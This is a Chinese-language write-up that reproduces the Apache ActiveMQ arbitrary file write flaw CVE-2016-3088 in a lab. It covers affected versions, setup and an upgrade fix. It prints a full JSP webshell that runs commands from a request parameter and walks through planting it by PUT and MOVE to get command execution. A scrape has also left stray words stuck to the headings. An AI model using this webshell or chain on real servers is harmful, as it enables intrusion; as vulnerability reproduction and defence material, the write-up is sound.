Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现

Apache ActiveMQ任意文件写入漏洞(CVE-2016-3088)复现html

1、漏洞描述java

该漏洞出如今fileserver应用中,漏洞原理:ActiveMQ中的fileserver服务容许用户经过HTTP PUT方法上传文件到指定目录。Fileserver支持写入文件(不解析jsp),可是支持移动文件(Move)咱们能够将jsp的文件PUT到Fileserver下,而后再经过Move指令移动到可执行目录下访问。web

2、漏洞影响版本shell

Apache ActiveMQ 5.0.0 - 5.13.2apache

3、漏洞环境搭建浏览器

一、官网下载apache-activemq-5.7.0-bin.tar 下载地址:http://activemq.apache.org/download-archives.htmljsp

二、解压 post

三、启动,进入bin目录下,运行./activemq startspa

  

四、浏览器访问http://192.168.10.149:8161/,以下图能够看到成功搭建环境code

  

4、漏洞复现

一、PUT上传一个jsp的webshell到fileserver目录,下图能够看到成功上传jsp文件

Jsp文件内容:

<%@ page import="java.io.*"%>

<%

 out.print("Hello</br>");

 String strcmd=request.getParameter("cmd");

 String line=null;

 Process p=Runtime.getRuntime().exec(strcmd);

 BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));

 

 while((line=br.readLine())!=null){

  out.print(line+"</br>");

 }

%>

  

二、浏览器访问http://192.168.10.149:8161/fileserver/1.jsp,下图能够看到fileserver目录下的webshell没有被解析,说明fileserver目录没有执行权限

  

三、利用该版本存在物理路径泄露漏洞,爆一下绝对路径

  

四、利用Move方法将webshell移入admin目录下,以下图所示成功把文件移入到admin目录

  

五、利用该版本存在的未受权访问漏洞,不用登陆,访问http://192.168.10.149:8161/admin/1.jsp?cmd=ls,下图能够看到成功执行命令

  

5、漏洞防护

一、ActiveMQ Fileserver 的功能在 5.14.0 及其之后的版本中已被移除。建议用户升级至 5.14.0 及其之后版本。

 

 ---------------------------------------------------------------------------------

参考: https://www.secpulse.com/archives/60064.html

 

转载于:https://www.cnblogs.com/yuzly/p/11278131.html